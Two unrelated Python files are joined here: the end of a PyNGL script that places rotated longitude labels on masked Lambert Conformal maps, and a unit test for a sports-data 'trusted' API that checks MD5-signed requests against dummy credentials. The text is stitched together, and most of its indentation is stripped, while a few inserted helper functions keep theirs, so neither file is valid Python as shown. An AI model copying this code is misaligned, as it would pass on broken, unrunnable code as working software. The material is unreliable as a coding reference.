if(lon_values[n] < 0):
if(HEMISPHERE == "NH"):
lon_labels.append("{}~S~o~N~W{}".format(str(np.abs(lon_values[n])),ctrl))
else:
lon_labels.append("{}{}~S~o~N~W".format(ctrl,str(np.abs(lon_values[n]))))
elif(lon_values[n] > 0):
if(HEMISPHERE == "NH"):
lon_labels.append("{}~S~o~N~E{}".format(str(lon_values[n]),ctrl))
else:
lon_labels.append("{}{}~S~o~N~E".format(ctrl,str(lon_values[n])))
else:
if(HEMISPHERE == "NH"):
lon_labels.append("{}0~S~o~N~{}".format(ctrl,ctrl))
else:
lon_labels.append("{}0~S~o~N~{}".format(ctrl,ctrl))
#-- For each longitude label, we need to figure out how much to rotate
#-- it, so get the approximate slope at that point.
if(HEMISPHERE == "NH"): #-- add labels to bottom of LC plot
lon1_ndc,lat1_ndc = Ngl.datatondc(map, lon_values[n]-0.5, minlat)
lon2_ndc,lat2_ndc = Ngl.datatondc(map, lon_values[n]+0.5, minlat)
txres.txJust = "TopCenter"
else: #-- add labels to top of LC plot
lon1_ndc,lat1_ndc = Ngl.datatondc(map, lon_values[n]+0.5, maxlat)
lon2_ndc,lat2_ndc = Ngl.datatondc(map, lon_values[n]-0.5, maxlat)
txres.txJust = "BottomCenter"
slope_bot = (lat1_ndc-lat2_ndc)/(lon1_ndc-lon2_ndc)
txres.txAngleF = RAD_TO_DEG * np.arctan(slope_bot)
#-- attach to map
dum_bot.append(Ngl.add_text(wks, map, str(lon_labels[n]), \
lon_values[n], lat_val, txres))
return
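#-------------------------------------------------------
# Illustrative sketch (not used above): the label-rotation
# math in isolation. Given two NDC points along a map edge,
# the text angle is the arctangent of the NDC slope in
# degrees, plus an offset (+/-90 for the latitude labels).
#-------------------------------------------------------
def _ndc_slope_angle(x1, y1, x2, y2, offset=0.):
    slope = (y2 - y1) / (x2 - x1)
    return np.degrees(np.arctan(slope)) + offset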
#-------------------------------------------------------
# MAIN
#-------------------------------------------------------
wks = Ngl.open_wks("png","plot_mptick_10") #-- open workstation
#-----------------------------------
#-- first plot: Lambert Conformal
#-----------------------------------
#-- northern hemisphere
minlon = -90. #-- min lon to mask
maxlon = 40. #-- max lon to mask
minlat = 20. #-- min lat to mask
maxlat = 80. #-- max lat to mask
mpres = Ngl.Resources() #-- resource object
mpres.nglMaximize = True
mpres.nglDraw = False #-- turn off plot draw and frame advance. We will
mpres.nglFrame = False #-- do it later after adding subtitles.
mpres.mpFillOn = True #-- turn map fill on
mpres.mpOutlineOn = False #-- outline map
mpres.mpOceanFillColor = "Transparent" #-- set ocean fill color to transparent
mpres.mpLandFillColor = "Gray90" #-- set land fill color to gray
mpres.mpInlandWaterFillColor = "Gray90" #-- set inland water fill color to gray
mpres.tiMainString = "Adding lat/lon labels to a masked LC map~C~(northern hemisphere)"
mpres.tiMainOffsetYF = 0.05
mpres.tiMainFontHeightF = 0.016 #-- decrease font size
mpres.mpProjection = "LambertConformal"
mpres.nglMaskLambertConformal = True #-- turn on lc masking
mpres.mpLambertParallel1F = 10
mpres.mpLambertParallel2F = 70
mpres.mpLambertMeridianF = -100
mpres.mpLimitMode = "LatLon"
mpres.mpMinLonF = minlon
mpres.mpMaxLonF = maxlon
mpres.mpMinLatF = minlat
mpres.mpMaxLatF = maxlat
mpres.mpGridAndLimbOn = True
mpres.mpGridSpacingF = 10.
mpres.pmTickMarkDisplayMode = "Always"
#-- create and draw the basic map
map = Ngl.map(wks,mpres)
#-- add labels to the plot
tx = add_labels_lcm(wks,map,10,10)
#-- draw the plot and advance the frame
Ngl.maximize_plot(wks,map)
Ngl.draw(map)
Ngl.frame(wks)
#-----------------------------------
#-- second plot: Lambert Conformal, southern hemisphere
#-----------------------------------
#-- southern hemisphere
minlat = -80. #-- min lat to mask
maxlat = -20. #-- max lat to mask
mpres.mpMinLatF = minlat
mpres.mpMaxLatF = maxlat
mpres.tiMainString = "Adding lat/lon labels to a masked LC map~C~(southern hemisphere)"
#-- create and draw the basic map
map = Ngl.map(wks,mpres)
#-- add labels to the plot
tx = add_labels_lcm(wks,map,10,10)
#-- maximize the plot, draw it and advance the frame
Ngl.maximize_plot(wks,map)
Ngl.draw(map)
Ngl.frame(wks)
Ngl.end()
|
|
import copy
import datetime
import unittest2
import webtest
import json
import md5
import api_main
import cron_main
from google.appengine.api import taskqueue
from google.appengine.ext import ndb
from google.appengine.ext import testbed
from consts.account_permissions import AccountPermissions
from consts.auth_type import AuthType
from consts.event_type import EventType
from consts.media_type import MediaType
from consts.playoff_type import PlayoffType
from models.account import Account
from models.api_auth_access import ApiAuthAccess
from models.award import Award
from models.event import Event
from models.event_team import EventTeam
from models.match import Match
from models.media import Media
from models.sitevar import Sitevar
from models.team import Team
from models.zebra_motionworks import ZebraMotionWorks
class TestApiTrustedController(unittest2.TestCase):
def setUp(self):
self.testapp = webtest.TestApp(api_main.app)
self.cronapp = webtest.TestApp(cron_main.app)
self.testbed = testbed.Testbed()
self.testbed.activate()
self.testbed.init_datastore_v3_stub()
self.testbed.init_urlfetch_stub()
self.testbed.init_memcache_stub()
self.testbed.init_user_stub()
ndb.get_context().clear_cache() # Prevent data from leaking between tests
self.testbed.init_taskqueue_stub(root_path=".")
self.taskqueue_stub = self.testbed.get_stub(testbed.TASKQUEUE_SERVICE_NAME)
self.teams_auth = ApiAuthAccess(id='tEsT_id_0',
secret='321tEsTsEcReT',
description='test',
event_list=[ndb.Key(Event, '2014casj')],
auth_types_enum=[AuthType.EVENT_TEAMS])
self.matches_auth = ApiAuthAccess(id='tEsT_id_1',
secret='321tEsTsEcReT',
description='test',
event_list=[ndb.Key(Event, '2014casj')],
auth_types_enum=[AuthType.EVENT_MATCHES])
self.rankings_auth = ApiAuthAccess(id='tEsT_id_2',
secret='321tEsTsEcReT',
description='test',
event_list=[ndb.Key(Event, '2014casj')],
auth_types_enum=[AuthType.EVENT_RANKINGS])
self.alliances_auth = ApiAuthAccess(id='tEsT_id_3',
secret='321tEsTsEcReT',
description='test',
event_list=[ndb.Key(Event, '2014casj')],
auth_types_enum=[AuthType.EVENT_ALLIANCES])
self.awards_auth = ApiAuthAccess(id='tEsT_id_4',
secret='321tEsTsEcReT',
description='test',
event_list=[ndb.Key(Event, '2014casj')],
auth_types_enum=[AuthType.EVENT_AWARDS])
self.video_auth = ApiAuthAccess(id='tEsT_id_5',
secret='321tEsTsEcReT',
description='test',
event_list=[ndb.Key(Event, '2014casj')],
auth_types_enum=[AuthType.MATCH_VIDEO])
self.expired_auth = ApiAuthAccess(id='tEsT_id_6',
secret='321tEsTsEcReT',
description='test',
event_list=[ndb.Key(Event, '2014casj')],
auth_types_enum=[AuthType.EVENT_MATCHES],
expiration=datetime.datetime(year=1970, month=1, day=1))
self.owned_auth = ApiAuthAccess(id='tEsT_id_7',
secret='321tEsTsEcReT',
description='test',
event_list=[ndb.Key(Event, '2014casj')],
auth_types_enum=[AuthType.EVENT_MATCHES],
owner=ndb.Key(Account, "42"))
self.owned_auth_expired = ApiAuthAccess(id='tEsT_id_8',
secret='321tEsTsEcReT',
description='test',
event_list=[ndb.Key(Event, '2014casj')],
auth_types_enum=[AuthType.EVENT_MATCHES],
owner=ndb.Key(Account, "42"),
expiration=datetime.datetime(year=1970, month=1, day=1))
self.event_info_auth = ApiAuthAccess(id='tEsT_id_9',
secret='321tEsTsEcReT',
description='test',
event_list=[ndb.Key(Event, '2014casj')],
auth_types_enum=[AuthType.EVENT_INFO])
self.event_zebra_motionworks = ApiAuthAccess(id='tEsT_id_10',
secret='321tEsTsEcReT',
description='test',
event_list=[ndb.Key(Event, '2014casj')],
auth_types_enum=[AuthType.ZEBRA_MOTIONWORKS])
self.event = Event(
id='2014casj',
event_type_enum=EventType.REGIONAL,
event_short='casj',
year=2014,
)
self.event.put()
def tearDown(self):
self.testbed.deactivate()
def loginUser(self, is_admin=False):
self.testbed.setup_env(
user_email="foo@bar.com",
user_id="42",
user_is_admin='1' if is_admin else '0',
overwrite=True)
def grantPermission(self, permission):
self.account = Account(id="42", permissions=[permission])
self.account.put()
def test_auth(self):
request_path = '/api/trusted/v1/event/2014casj/matches/update'
request_path_caps_key = '/api/trusted/v1/event/2014CASJ/matches/update'
# Fail
response = self.testapp.post(request_path, expect_errors=True)
self.assertEqual(response.status_code, 400)
self.assertTrue('Error' in response.json)
# Fail
request_body = json.dumps([])
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 401)
self.assertTrue('Error' in response.json)
self.rankings_auth.put()
self.matches_auth.put()
# Pass
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
# Pass; all caps key
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path_caps_key, request_body)).hexdigest()
response = self.testapp.post(request_path_caps_key, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
# Fail; bad X-TBA-Auth-Id
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'badTestAuthId', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 401)
self.assertTrue('Error' in response.json)
# Fail; bad sig
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': '123abc'}, expect_errors=True)
self.assertEqual(response.status_code, 401)
self.assertTrue('Error' in response.json)
# Fail; bad sig due to wrong body
body2 = json.dumps([{}])
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, body2, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 401)
self.assertTrue('Error' in response.json)
# Fail; bad event
request_path2 = '/api/trusted/v1/event/2014cama/matches/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path2, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 401)
self.assertTrue('Error' in response.json)
# Fail; insufficient auth_types_enum
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_2', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 401)
self.assertTrue('Error' in response.json)
# Fail; expired keys
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_6', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 401)
self.assertTrue('Error' in response.json)
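    def _compute_trusted_sig(self, secret, request_path, request_body):
        # Illustrative helper (not used by the tests above): the trusted API
        # signature is the MD5 hex digest of secret + request path + request
        # body, sent as X-TBA-Auth-Sig alongside X-TBA-Auth-Id.
        return md5.new('{}{}{}'.format(secret, request_path, request_body)).hexdigest()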
def test_admin_auth(self):
        # Ensure that a logged-in admin user can access any event
request_path = '/api/trusted/v1/event/2014casj/matches/update'
request_body = json.dumps([])
self.loginUser(is_admin=True)
response = self.testapp.post(request_path, request_body, expect_errors=True)
self.assertEqual(response.status_code, 200)
def test_user_auth(self):
# Ensure that a logged in user can use auths granted to their account
request_path = '/api/trusted/v1/event/2014casj/matches/update'
request_body = json.dumps([])
self.owned_auth.put()
self.loginUser()
response = self.testapp.post(request_path, request_body, expect_errors=True)
self.assertEqual(response.status_code, 200)
def test_user_expired_auth(self):
        # Ensure that an expired auth granted to a user's account cannot be used
request_path = '/api/trusted/v1/event/2014casj/matches/update'
request_body = json.dumps([])
self.owned_auth_expired.put()
self.loginUser()
# Should end up with a 400 error because the expired key didn't count and no explicit
# Auth-Id header was passed
response = self.testapp.post(request_path, request_body, expect_errors=True)
self.assertEqual(response.status_code, 400)
self.assertTrue('Error' in response.json)
def test_user_permission(self):
self.loginUser()
self.grantPermission(AccountPermissions.OFFSEASON_EVENTWIZARD)
# This should only work for current year offseasons
self.event.year = datetime.datetime.now().year
self.event.event_type_enum = EventType.OFFSEASON
self.event.put()
request_path = '/api/trusted/v1/event/2014casj/matches/update'
request_body = json.dumps([])
response = self.testapp.post(request_path, request_body, expect_errors=True)
self.assertEqual(response.status_code, 200)
def test_user_permission_fail_not_current_year(self):
self.loginUser()
self.grantPermission(AccountPermissions.OFFSEASON_EVENTWIZARD)
# This should only work for current year offseasons
self.event.year = 2012 # Unless this runs in a time machine...
self.event.event_type_enum = EventType.OFFSEASON
self.event.put()
request_path = '/api/trusted/v1/event/2014casj/matches/update'
request_body = json.dumps([])
response = self.testapp.post(request_path, request_body, expect_errors=True)
self.assertEqual(response.status_code, 400)
def test_user_permission_fail_not_offseason_event(self):
self.loginUser()
self.grantPermission(AccountPermissions.OFFSEASON_EVENTWIZARD)
# This should only work for current year offseasons
self.event.year = datetime.datetime.now().year
self.event.event_type_enum = EventType.REGIONAL
self.event.put()
request_path = '/api/trusted/v1/event/2014casj/matches/update'
request_body = json.dumps([])
response = self.testapp.post(request_path, request_body, expect_errors=True)
self.assertEqual(response.status_code, 400)
def test_user_permission_fail_not_granted(self):
self.loginUser()
# This should only work for current year offseasons
self.event.year = datetime.datetime.now().year
self.event.event_type_enum = EventType.OFFSEASON
self.event.put()
request_path = '/api/trusted/v1/event/2014casj/matches/update'
request_body = json.dumps([])
response = self.testapp.post(request_path, request_body, expect_errors=True)
self.assertEqual(response.status_code, 400)
def test_killswitch(self):
request_path = '/api/trusted/v1/event/2014casj/matches/update'
request_body = json.dumps([])
# Pass
self.matches_auth.put()
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
# Now, set the disable sitevar
trusted_sitevar = Sitevar(
id='trustedapi',
values_json=json.dumps({
3: False,
})
)
trusted_sitevar.put()
# Fail
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 401)
def test_alliance_selections_update(self):
self.alliances_auth.put()
alliances = [['frc971', 'frc254', 'frc1662'],
['frc1678', 'frc368', 'frc4171'],
['frc2035', 'frc192', 'frc4990'],
['frc1323', 'frc846', 'frc2135'],
['frc2144', 'frc1388', 'frc668'],
['frc1280', 'frc604', 'frc100'],
['frc114', 'frc852', 'frc841'],
['frc2473', 'frc3256', 'frc1868']]
request_body = json.dumps(alliances)
request_path = '/api/trusted/v1/event/2014casj/alliance_selections/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_3', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(self.event.alliance_selections), 8)
for i, selection in enumerate(self.event.alliance_selections):
self.assertEqual(alliances[i], selection['picks'])
def test_empty_alliance_selections_update(self):
self.alliances_auth.put()
alliances = [['frc971', 'frc254', 'frc1662'],
['frc1678', 'frc368', 'frc4171'],
['frc2035', 'frc192', 'frc4990'],
['frc1323', 'frc846', 'frc2135'],
[], [], [], []]
request_body = json.dumps(alliances)
request_path = '/api/trusted/v1/event/2014casj/alliance_selections/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_3', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(self.event.alliance_selections), 4)
for i, selection in enumerate(self.event.alliance_selections):
self.assertEqual(alliances[i], selection['picks'])
def test_awards_update(self):
self.awards_auth.put()
awards = [{'name_str': 'Winner', 'team_key': 'frc254'},
{'name_str': 'Winner', 'team_key': 'frc604'},
{'name_str': 'Volunteer Blahblah', 'team_key': 'frc1', 'awardee': 'Bob Bobby'}]
request_body = json.dumps(awards)
request_path = '/api/trusted/v1/event/2014casj/awards/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_4', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
db_awards = Award.query(Award.event == self.event.key).fetch(None)
self.assertEqual(len(db_awards), 2)
self.assertTrue('2014casj_1' in [a.key.id() for a in db_awards])
self.assertTrue('2014casj_5' in [a.key.id() for a in db_awards])
awards = [{'name_str': 'Winner', 'team_key': 'frc254'},
{'name_str': 'Winner', 'team_key': 'frc604'}]
request_body = json.dumps(awards)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_4', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
db_awards = Award.query(Award.event == self.event.key).fetch(None)
self.assertEqual(len(db_awards), 1)
self.assertTrue('2014casj_1' in [a.key.id() for a in db_awards])
def test_matches_update(self):
self.matches_auth.put()
update_request_path = '/api/trusted/v1/event/2014casj/matches/update'
delete_request_path = '/api/trusted/v1/event/2014casj/matches/delete'
delete_all_request_path = '/api/trusted/v1/event/2014casj/matches/delete_all'
# add one match
matches = [{
'comp_level': 'qm',
'set_number': 1,
'match_number': 1,
'alliances': {
'red': {'teams': ['frc1', 'frc2', 'frc3'],
'score': 25},
'blue': {'teams': ['frc4', 'frc5', 'frc6'],
'score': 26},
},
'time_string': '9:00 AM',
'time_utc': '2014-08-31T16:00:00',
}]
request_body = json.dumps(matches)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', update_request_path, request_body)).hexdigest()
response = self.testapp.post(update_request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
db_matches = Match.query(Match.event == self.event.key).fetch(None)
self.assertEqual(len(db_matches), 1)
self.assertTrue('2014casj_qm1' in [m.key.id() for m in db_matches])
# add another match
matches = [{
'comp_level': 'f',
'set_number': 1,
'match_number': 1,
'alliances': {
'red': {'teams': ['frc1', 'frc2', 'frc3'],
'score': 250},
'blue': {'teams': ['frc4', 'frc5', 'frc6'],
'score': 260},
},
'time_string': '10:00 AM',
'time_utc': '2014-08-31T17:00:00',
}]
request_body = json.dumps(matches)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', update_request_path, request_body)).hexdigest()
response = self.testapp.post(update_request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
db_matches = Match.query(Match.event == self.event.key).fetch(None)
self.assertEqual(len(db_matches), 2)
self.assertTrue('2014casj_qm1' in [m.key.id() for m in db_matches])
self.assertTrue('2014casj_f1m1' in [m.key.id() for m in db_matches])
# add a match and delete a match
matches = [{
'comp_level': 'f',
'set_number': 1,
'match_number': 2,
'alliances': {
'red': {'teams': ['frc1', 'frc2', 'frc3'],
'score': 250,
'surrogates': ['frc1'],
                        'dqs': ['frc1', 'frc2', 'frc3']},
'blue': {'teams': ['frc4', 'frc5', 'frc6'],
'score': 260,
'surrogates': [],
'dqs': []},
},
'score_breakdown': {
'red': {'auto': 20, 'assist': 40, 'truss+catch': 20, 'teleop_goal+foul': 20},
'blue': {'auto': 40, 'assist': 60, 'truss+catch': 10, 'teleop_goal+foul': 40},
},
'time_string': '11:00 AM',
'time_utc': '2014-08-31T18:00:00',
}]
request_body = json.dumps(matches)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', update_request_path, request_body)).hexdigest()
response = self.testapp.post(update_request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
keys_to_delete = ['qm1']
request_body = json.dumps(keys_to_delete)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', delete_request_path, request_body)).hexdigest()
response = self.testapp.post(delete_request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json['keys_deleted'], ['qm1'])
db_matches = Match.query(Match.event == self.event.key).fetch(None)
self.assertEqual(len(db_matches), 2)
self.assertTrue('2014casj_f1m1' in [m.key.id() for m in db_matches])
self.assertTrue('2014casj_f1m2' in [m.key.id() for m in db_matches])
# verify match data
match = Match.get_by_id('2014casj_f1m2')
self.assertEqual(match.time, datetime.datetime(2014, 8, 31, 18, 0))
self.assertEqual(match.time_string, '11:00 AM')
self.assertEqual(match.alliances['red']['teams'], ['frc1', 'frc2', 'frc3'])
self.assertEqual(match.alliances['red']['score'], 250)
self.assertEqual(match.alliances['red']['surrogates'], ['frc1'])
self.assertEqual(match.alliances['red']['dqs'], ['frc1', 'frc2', 'frc3'])
self.assertEqual(match.score_breakdown['red']['truss+catch'], 20)
self.assertEqual(match.alliances['blue']['teams'], ['frc4', 'frc5', 'frc6'])
self.assertEqual(match.alliances['blue']['score'], 260)
self.assertEqual(match.alliances['blue']['surrogates'], [])
self.assertEqual(match.alliances['blue']['dqs'], [])
# test delete all matches
request_body = ''
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', delete_all_request_path, request_body)).hexdigest()
response = self.testapp.post(delete_all_request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 400)
request_body = '2014casj'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', delete_all_request_path, request_body)).hexdigest()
response = self.testapp.post(delete_all_request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
db_matches = Match.query(Match.event == self.event.key).fetch(None)
self.assertEqual(len(db_matches), 0)
def test_rankings_update(self):
self.rankings_auth.put()
rankings = {
'breakdowns': ['QS', 'Auton', 'Teleop', 'T&C'],
'rankings': [
{'team_key': 'frc254', 'rank': 1, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
{'team_key': 'frc971', 'rank': 2, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200}
],
}
request_body = json.dumps(rankings)
request_path = '/api/trusted/v1/event/2014casj/rankings/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_2', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(self.event.rankings[0], ['Rank', 'Team', 'QS', 'Auton', 'Teleop', 'T&C', 'DQ', 'Played'])
self.assertEqual(self.event.rankings[1], [1, '254', 20, 500, 500, 200, 0, 10])
def test_rankings_wlt_update(self):
self.rankings_auth.put()
rankings = {
'breakdowns': ['QS', 'Auton', 'Teleop', 'T&C', 'wins', 'losses', 'ties'],
'rankings': [
{'team_key': 'frc254', 'rank': 1, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
{'team_key': 'frc971', 'rank': 2, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200}
],
}
request_body = json.dumps(rankings)
request_path = '/api/trusted/v1/event/2014casj/rankings/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_2', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(self.event.rankings[0], ['Rank', 'Team', 'QS', 'Auton', 'Teleop', 'T&C', 'Record (W-L-T)', 'DQ', 'Played'])
self.assertEqual(self.event.rankings[1], [1, '254', 20, 500, 500, 200, '10-0-0', 0, 10])
def test_eventteams_update(self):
self.teams_auth.put()
team_list = ['frc254', 'frc971', 'frc604']
request_body = json.dumps(team_list)
# Insert teams into db, otherwise they won't get added (see 072058b)
Team(id='frc254', team_number=254).put()
Team(id='frc971', team_number=971).put()
Team(id='frc604', team_number=604).put()
Team(id='frc100', team_number=100).put()
request_path = '/api/trusted/v1/event/2014casj/team_list/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_0', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
db_eventteams = EventTeam.query(EventTeam.event == self.event.key).fetch(None)
self.assertEqual(len(db_eventteams), 3)
self.assertTrue('2014casj_frc254' in [et.key.id() for et in db_eventteams])
self.assertTrue('2014casj_frc971' in [et.key.id() for et in db_eventteams])
self.assertTrue('2014casj_frc604' in [et.key.id() for et in db_eventteams])
team_list = ['frc254', 'frc100']
request_body = json.dumps(team_list)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_0', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
db_eventteams = EventTeam.query(EventTeam.event == self.event.key).fetch(None)
self.assertEqual(len(db_eventteams), 2)
self.assertTrue('2014casj_frc254' in [et.key.id() for et in db_eventteams])
self.assertTrue('2014casj_frc100' in [et.key.id() for et in db_eventteams])
def test_eventteams_unknown(self):
self.teams_auth.put()
team_list = ['frc254', 'frc971', 'frc604']
request_body = json.dumps(team_list)
# Insert teams into db, otherwise they won't get added (see 072058b)
Team(id='frc254', team_number=254).put()
Team(id='frc971', team_number=971).put()
request_path = '/api/trusted/v1/event/2014casj/team_list/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_0', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
db_eventteams = EventTeam.query(EventTeam.event == self.event.key).fetch(None)
self.assertEqual(len(db_eventteams), 2)
self.assertTrue('2014casj_frc254' in [et.key.id() for et in db_eventteams])
self.assertTrue('2014casj_frc971' in [et.key.id() for et in db_eventteams])
self.assertTrue('2014casj_frc604' not in [et.key.id() for et in db_eventteams])
team_list = ['frc254', 'frc100']
request_body = json.dumps(team_list)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_0', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
db_eventteams = EventTeam.query(EventTeam.event == self.event.key).fetch(None)
self.assertEqual(len(db_eventteams), 1)
self.assertTrue('2014casj_frc254' in [et.key.id() for et in db_eventteams])
self.assertTrue('2014casj_frc100' not in [et.key.id() for et in db_eventteams])
def test_match_videos_add(self):
self.video_auth.put()
match1 = Match(
id="2014casj_qm1",
alliances_json="""{"blue": {"score": -1, "teams": ["frc3464", "frc20", "frc1073"]}, "red": {"score": -1, "teams": ["frc69", "frc571", "frc176"]}}""",
comp_level="qm",
event=ndb.Key(Event, '2014casj'),
year=2014,
set_number=1,
match_number=1,
team_key_names=[u'frc69', u'frc571', u'frc176', u'frc3464', u'frc20', u'frc1073'],
youtube_videos=["abcdef"]
)
match1.put()
match2 = Match(
id="2014casj_sf1m1",
alliances_json="""{"blue": {"score": -1, "teams": ["frc3464", "frc20", "frc1073"]}, "red": {"score": -1, "teams": ["frc69", "frc571", "frc176"]}}""",
comp_level="sf",
event=ndb.Key(Event, '2014casj'),
year=2014,
set_number=1,
match_number=1,
team_key_names=[u'frc69', u'frc571', u'frc176', u'frc3464', u'frc20', u'frc1073'],
)
match2.put()
match_videos = {'qm1': 'aFZy8iibMD0', 'sf1m1': 'RpSgUrsghv4'}
request_body = json.dumps(match_videos)
request_path = '/api/trusted/v1/event/2014casj/match_videos/add'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_5', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(set(Match.get_by_id('2014casj_qm1').youtube_videos), {'abcdef', 'aFZy8iibMD0'})
